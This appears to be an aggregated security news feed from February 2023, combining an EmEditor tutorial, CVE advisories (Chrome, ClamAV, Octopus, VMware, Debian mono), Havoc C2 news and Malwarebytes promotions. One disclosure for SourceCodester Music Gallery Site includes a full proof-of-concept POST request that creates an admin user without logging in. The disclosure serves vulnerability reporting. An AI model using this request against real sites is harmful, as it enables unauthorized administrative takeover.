By Waqas
If you use EmEditor, this user-friendly tutorial will explain how to remove duplicate lines in the popular EmEditor text editor software.
This is a post from HackRead.com Read the original post: How to Remove Duplicate Lines in EmEditor (2023)

EmEditor is a smart text editor software for Windows that supports a wide range of file formats, including plain text files, programming languages, Unicode, and large files.

EmEditor is developed by Emurasoft, Inc. The brain behind creating EmEditor is Emurasoft’s president Yutaka Emura who is based in the United States. Emura is also known for developing the EmTerm communication program.

EmEditor offers various features, including syntax highlighting, code folding, regular expressions, macros, multiple document support, and more.

EmEditor also supports plugins that extend its functionality and can be used for advanced tasks such as code debugging, web development, and text manipulation. It is available in both free and paid versions, with the paid version providing additional features and capabilities for power users.

**How to Remove Duplicate Lines in EmEditor?**

Although EmEditor is user-friendly software, with loads of options and features, it is not easy to find a quick solution at once. Therefore, we have decided to break down for our readers how they can remove duplicate lines in EmEditor.

To remove duplicate lines in EmEditor, you can follow these steps:

*   Open the document in EmEditor.
*   Select the lines that you want to remove duplicates from.
*   Click on the “Sort” button on the toolbar or go to the “Sort” menu and choose “Sort Ascending” or “Sort Descending“. This will arrange the selected lines in alphabetical or reverse alphabetical order.
*   After sorting the lines, go to the “Edit” menu and select “Remove Duplicate Lines“. This will remove all the duplicate lines from the selected lines.

Alternatively, you can also use EmEditor’s built-in macro to remove duplicate lines. Here are the steps:

*   Open the document in EmEditor.
*   Press “Ctrl + Shift +R” to open the “Record Micro” dialog box.
*   Enter a name for the macro and click “OK“.
*   Go to the “Edit” menu and select “Remove Duplicate Lines“.
*   Press “Ctrl + Shift +R” again to stop recording the macro.
*   Go to the “Macro” menu and select “Save” to save the macro.
*   To run the macro, go to the “Macro” menu and select the macro you just created.

If this How-To was helpful, don’t forget to share it, and let us know which other How-To you’d like to see us work on.

1.  Crucial Tips for Secure Form Submissions
2.  How to Craft Rich Data-Driven Infographics
3.  How to Dual Boot Android and Windows Easily
4.  How to Create ISO Files from Discs – 3 Best Ways
5.  How to Optimize Your Database Storage in MySQL
6.  How to configure cPanel and WHM Panel on your VPS
7.  MySQL Performance Tuning: Tips for Blazing Fast Queries

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

How to Remove Duplicate Lines in EmEditor (2023)

Use after free in WebRTC in Google Chrome on Windows prior to 110.0.5481.177 allowed a remote attacker who convinced the user to engage in specific UI interactions to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

CVE-2023-0932: Stable Channel Desktop Update

A vulnerability was found in SourceCodester Music Gallery Site 1.0. It has been rated as critical. This issue affects some unknown processing of the file Users.php of the component POST Request Handler. The manipulation leads to improper access controls. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-221633 was assigned to this vulnerability.

**Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application.****Date:**

> 21 February 2023

**Author Email:**

> navaidnasari@hotmail.co.uk

**Vendor Homepage:**

> https://www.sourcecodester.com

**Software Link:**

> Music Gallery Site

**Version:**

> v 1.0

**Broken Authentication:**

> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

**Vulnerable URLs:**

> /php-music/classes/Users.php

> /php-music/classes/Master.php

**Affected Page:**

> Users.php , Master.php On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.

**Description:**

> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users

**Proof of Concept:**

> Following steps are involved:

1.  Send a POST request with required parameter to Users.php?f=save (See Below Request)
    
2.  Request:
    

    POST /php-music/classes/Users.php?f=save HTTP/1.1
    Host: localhost
    Content-Length: 876
    sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
    Accept: */*
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp
    X-Requested-With: XMLHttpRequest
    sec-ch-ua-mobile: ?0
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
    sec-ch-ua-platform: "Linux"
    Origin: http://localhost
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: cors
    Sec-Fetch-Dest: empty
    Referer: http://localhost/php-music/admin/?page=user/manage_user
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Connection: close
    
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="id"
    
    
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="firstname"
    
    Test
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="middlename"
    
    Admin
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="lastname"
    
    Check
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="username"
    
    testadmin
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="password"
    
    test123
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="type"
    
    1
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp
    Content-Disposition: form-data; name="img"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryjwBNagY7zt6cjYHp--
    
    

3.  It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)

4.  Vulnerable Code Snippets:

Users.php

Master.php

**Recommendation:**

> Whoever uses this CMS, should update the authorization mechanism on top of the Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack:

CVE-2023-0963: CVE_Demo/Music Gallery Site - Broken Access Control.md at main · navaidzansari/CVE_Demo

Patch released for bug that poses a critical risk to vulnerable technologies

John Leyden 22 February 2023 at 14:23 UTC

Patch released for bug that poses a critical risk to vulnerable technologies

A security flaw in a bundle anti-malware scanner product has created a serious security risk for some products from networking giant Cisco.

More particularly, a vulnerability in the ClamAV scanning library (tracked as CVE-2023-20032) created a critical security risk for Cisco’s Secure Web Appliance as well as various versions of Cisco Secure Endpoint (including Windows, MacOS, Linux, and cloud).

Cisco released an advisory on the vulnerability – alongside patches for affected products – last week. Although the vulnerability is not under active attack, patching is nonetheless recommended.

The partition scanning buffer overflow vulnerability poses a critical risk to vulnerable technologies.

Catch up with the latest network security news and analysis

As explained in Cisco’s security advisory, a vulnerability in the HFS+ partition file parser of ClamAV creates a mechanism to push malicious code onto either endpoint devices or vulnerable instances of Cisco’s Secure Web Appliance.

The vulnerability, which stems from an absent buffer size check, creates a heap buffer overflow risk in scanning HFS+ partition file. An attacker might be able to create a malicious partition file before offering it up for scanning by ClamAV.

“A successful exploit could allow the attacker to execute arbitrary code with the privileges of the ClamAV scanning process, or else crash the process, resulting in a denial of service (DoS) condition,” Cisco’s advisory explains.

**Use case**

ClamAV (Clam AntiVirus) is a free software, anti-malware toolkit originally developed for Unix. The technology - acquired by Cisco through an acquisition 10 years ago, has been ported to run on various operating systems including Linux, macOS, and Windows.

One of the main use cases for the technology is on mail servers as a server-side malware-in-email scanner.

However, Cisco has confirmed that neither its Secure Email Gateway nor its Secure Email and Web Manager appliances are vulnerable to this particular security bug.

**Who guards the guards?**

Any vulnerability in a security utility that allows potential miscreants to hack into affected devices show how tools designed to increase security can increase the attack surface exposed to potential attackers.

The security flaw in ClamAV’s HFS+ partition file parser, along with lesser a remote information leak vulnerability (tracked as CVE-2023-20052) in the DMG file parser of the same technology, were both discovered by Google engineer Simon Scannell. Google notified Cisco about security bugs in ClamAV last August.

An advisory by Google, posted on GitHub, offers a full technical run-down of the more serious CVE-2023-20032 vulnerability and its potential exploitation.

“We rate the vulnerability as high severity as the buffer overflow can be triggered when a scan is run with CL\_SCAN\_ARCHIVE enabled, which is enabled by default in most configurations.

“This feature is typically used to scan incoming emails on the backend of mail servers. As such, a remote, external, unauthenticated attacker can trigger this vulnerability,” Cisco’s advisory explains.

A technical blog post by German cybersecurity vendor ONEKEY concludes that the two flaws in ClamAV illustrate that “file format parsing is a difficult and complex endeavor”.

LIKED THIS ARTICLE? Sign up to our new newsletter – Daily Swig Deserialized

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw

Which of the myriad, extant cyberthreats should your business be paying the most attention to in 2023? 



(Read more...)




The post The 5 most dangerous cyberthreats facing businesses this year appeared first on Malwarebytes Labs.

Which of the myriad, extant cyberthreats should your business be paying the most attention to in 2023? 

That’s the question we set out to answer in this year’s annual State of Malware report, and the answers might surprise you. To understand why, you need to know what makes this year’s report so different from previous ones.

Unquestionably, over the last five years, the most serious cybersecurity task facing businesses has changed from defending against waves of malicious, email-borne malware to stopping seasoned criminals armed with Ransomware-as-a-Service (RaaS).

RaaS attacks can be extraordinarily severe. They can bring entire organizations to a halt, come with ruinous ransoms, and may take months of dedicated effort to recover from. They represent an existential threat to businesses.

The worst-of-the-worst is LockBit, the first on our list of the most dangerous threats you face. LockBit’s largest known ransom demand in 2022 was $50 million, although multiple sources report even higher demands were made. Its victims included businesses of all sizes, from local law firms with a handful of employees to multi-national enterprises.

LockBit was the most widely used RaaS in 2022, by far. It accounted for almost a third of all known RaaS attacks, and more than three times as many as its closest competitor, ALPHV.

Known attacks by the top 5 RaaS groups in 2022

And yet, if you were to create a list of the most detected malware from last year, you wouldn’t see LockBit on it. In fact, you wouldn’t see any RaaS on it. In cybersecurity, what’s common and what’s serious have diverged markedly.

For that reason, lists of the most detected malware are gone from this year’s report. In their place, we asked our experts—our threat intelligence analysts, and the threat hunters in our Managed Detection and Response (MDR) team: What essential information do resource-constrained organizations need to know?

They came up with a list of the five worst-in-class malware threats spanning Windows, Android and macOS. The report explains what these threats do and why, what it takes to detect them, and what it takes to recover from an attack. Each of our five is an archetype, so if you prepare to stop them, you’re well prepared for anything, on any of your devices.

Compiling our report like this also led us to an important insight: The most dangerous attacks you will face are not from the strangest new malware, the most sophisticated, the most eye-catching, or the most prevalent.

Instead, the most dangerous threats come from a set of known, mature tools and tactics that an entire ecosystem of cybercriminals rely upon to take in billions of dollars a year. Criminals have come to rely upon these attack types and their vectors because they work, and they work because they are hard to defend against and difficult to remove.

The 2023 State of Malware report explains what they are, how they find their victims, and how to avoid becoming one of them.

To learn more about LockBit and how to defend against it, and to discover the four other threats you should prepare for this year, download the 2023 State of Malware report. In it you will also learn:

*   What it takes to stop what Europol called the “world’s most dangerous malware.”
*   Why there was a 300% increase in some new malware delivery methods.
*   How to catch the emerging, hard-to-detect attacks that don’t rely on malware.
*   Why security people are as important as security software.

Get the 2023 State of Malware report

The 5 most dangerous cyberthreats facing businesses this year

An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel.
Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc.
"While C2 frameworks are prolific, the

Exploitation Framework / Cyber Threat

An open source command-and-control (C2) framework known as Havoc is being adopted by threat actors as an alternative to other well-known legitimate toolkits like Cobalt Strike, Sliver, and Brute Ratel.

Cybersecurity firm Zscaler said it observed a new campaign in the beginning of January 2023 targeting an unnamed government organization that utilized Havoc.

"While C2 frameworks are prolific, the open-source Havoc framework is an advanced post-exploitation command-and-control framework capable of bypassing the most current and updated version of Windows 11 defender due to the implementation of advanced evasion techniques such as indirect syscalls and sleep obfuscation," researchers Niraj Shivtarkar and Niraj Shivtarkar said.

The attack sequence documented by Zscaler begins with a ZIP archive that embeds a decoy document and a screen-saver file that's designed to download and launch the Havoc Demon agent on the infected host.

Demon is the implant generated via the Havoc Framework and is analogous to the Beacon delivered via Cobalt Strike to achieve persistent access and distribute malicious payloads.

It also comes with a wide variety of features that makes it difficult to detect, turning it into a lucrative tool in the hands of threat actors even as cybersecurity vendors are pushing back against the abuse of such legitimate red team software.

"After the demon is deployed successfully on the target's machine, the server is able to execute various commands on the target system," the researchers said, stating that the server logs the command and its response upon execution. The results are subsequently encrypted and transmitted back to the C2 server.

Havoc has also been employed in connection with a fraudulent npm module dubbed aabquerys that, once installed, triggers a three-stage process to retrieve the Demon implant. The package has since been taken down.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Threat Actors Adopt Havoc Framework for Post-Exploitation in Targeted Attacks

The mono package before 6.8.0.105+dfsg-3.3 for Debian allows arbitrary code execution because the application/x-ms-dos-executable MIME type is associated with an un-sandboxed Mono CLR interpreter.

CVE-2023-26314: #972146 - /usr/share/applications/mono-runtime-common.desktop: should not handle MIME type by executing arbitrary code (CVE-2023-26314)

In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service

Summary

Zipbomb resource exhaustion in Octopus Server (CVE-2022-2883)

Advisory Number

2023-01

Discovery Date

05 Nov 2022

Patch Release Date

06 Feb 2023

Advisory Release Date

14 Feb 2023

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-2883

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.4.8423 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible to upload a zipbomb file as a task which results in Denial of Service

The versions of Octopus Server affected by this vulnerability are:

*   All 0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x versions
*   All 2018.x.x, 2019.x.x, 2020.x.x, 2021.x.x versions
*   All 2022.1.x, 2022.2.x versions
*   All 2022.3.x versions before 2022.3.11043
*   All 2022.4.x versions before 2022.4.8401

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.3.11043
*   2022.4.8401

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.4.8423). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.4.8423):**

If you have feature version...

...then upgrade to this version

0.x.x, 1.x.x, 2.x.x, 3.x.x, 4.x.x

2022.3.11043 or greater

2018.x, 2019.x, 2020.x, 2021.x

2022.3.11043 or greater

2022.1.x, 2022.2.x

2022.3.11043 or greater

2022.3.x

2022.3.11043 or greater

2022.4.x

2022.4.8401 or greater

**Mitigation**

There is no known mitigation for CVE-2022-2883, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was found by Bartłomiej Górkiewicz

CVE-2022-2883: Security Advisory 2023-02

VMware Carbon Black App Control 8.7.x prior to 8.7.8, 8.8.x prior to 8.8.6, and 8.9.x.prior to 8.9.4 contain an injection vulnerability. A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.

Advisory ID: VMSA-2023-0004

CVSSv3 Range: 9.1

Issue Date: 2023-02-21

Updated On: 2023-02-21 (Initial Advisory)

CVE(s): CVE-2023-20858

Synopsis: VMware Carbon Black App Control updates address an injection vulnerability (CVE-2023-20858)

****1\. Impacted Products****

*   VMware Carbon Black App Control (App Control)

****2\. Introduction****

An injection vulnerability affecting VMware Carbon Black App Control was privately reported to VMware. Updates are available to address this vulnerability in affected VMware products.  

****3\. Injection Vulnerability (CVE-2023-20858)****

VMware Carbon Black App Control contains an injection vulnerability. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.1.

A malicious actor with privileged access to the App Control administration console may be able to use specially crafted input allowing access to the underlying server operating system.

To remediate CVE-2023-20858 update to the versions listed in the 'Fixed Version' column of the 'Response Matrix' found below.

VMware would like to thank Jari Jääskelä (@JJaaskela) for reporting this vulnerability to us.

Product

Version

Running On

CVE Identifier

CVSSv3

Severity

Fixed Version

Workarounds

Additional Documentation

App Control

8.9.x

Windows

CVE-2023-20858

9.1

critical

8.9.4

None

None

App Control

8.8.x

Windows

CVE-2023-20858

9.1

critical

8.8.6

None

None

App Control

8.7.x

Windows

CVE-2023-20858

9.1

critical

8.7.8

None

None

****4\. References****

****5\. Change Log****

**2023-02-21 VMSA-2023-0004  
**Initial security advisory.

****6\. Contact****

CVE-2023-20858: VMSA-2023-0004

Latest threat prevention module helps resource-strapped security teams block unsafe, untrusted or vulnerable applications.

**SANTA CLARA, Calif.****,** **Feb. 21, 2023** **/PRNewswire/ --** Malwarebytes™, a global leader in real-time cyberprotection, today announced the addition of Malwarebytes Application Block to its Nebula and OneView endpoint protection platforms. The new threat prevention module helps resource-strained security teams quickly guard against unsafe third-party Windows applications, meet key compliance requirements and encourage productivity without adding management complexity. 

Third-party apps pose a serious security threat to businesses with limited IT resources and expertise. Vulnerabilities in Android applications have led to more than one million malicious application downloads, with researchers frequently uncovering malware-ridden applications on Google Play. Since 63% of workers use unauthorized applications, businesses of all sizes can be vulnerable to phishing schemes or exploitation – two of the four leading ways attackers gain access to a company's network.1

For the over 1.4 billion monthly active Windows 10 or Windows 11 devices2, Application Block allows IT admins to blacklist or restrict access to outdated, untrusted, or unsafe applications with known vulnerabilities or that lack the latest patches. IT security teams can use Application Block's dashboard to understand what applications are being blocked in real-time, as well as its reporting features to meet key compliance requirements and navigate increasing data protection regulations.

"Third-party applications are essential to productivity, but they also greatly expand organizations' attack surfaces," said Malwarebytes Chief Product Officer, Mark Strassman. "Malwarebytes Application Block can be near-instantly deployed, helping resource-strapped organizations to effectively manage secure access to third-party apps and add another protective layer without added complexity."

Malwarebytes Application Block is immediately available for Windows endpoints within the Malwarebytes Nebula and OneView platforms to help organizations:

*   **Improve Application Security** – Stop the execution of vulnerable applications so that companies can test and apply updates or block the vulnerable application until a patch is available.
*   **Encourage Employee Productivity** – Restrict access to non-business-related applications, maximizing efficiency and saving resources.
*   **Satisfy Compliance Regulations** – Reduce the risk of failing to comply with data protection regulations such as GDPR, CIPA or HIPAA.

To read more about the latest threats and cyber protection strategies, visit our newsroom, or follow us on Facebook, Instagram, LinkedIn, TikTok and Twitter.

**About Malwarebytes**

Malwarebytes believes that when people and organizations are free from threats, they are free to thrive. Founded in 2008, Malwarebytes CEO Marcin Kleczynski had one mission: to rid the world of malware. Today, Malwarebytes' award-winning endpoint protection, privacy and threat prevention solutions and its world-class team of threat researchers protect millions of individuals and thousands of businesses across the globe. The effectiveness and ease-of-use of Malwarebytes solutions are consistently recognized by independent third parties including MITRE Engenuity, MRG Effitas, AVLAB, AV-TEST (consumer and business), Gartner Peer Insights, G2 Crowd and CNET. The company is headquartered in California with offices in Europe and Asia. For more information and career opportunities, visit https://www.malwarebytes.com.

Tag

#windows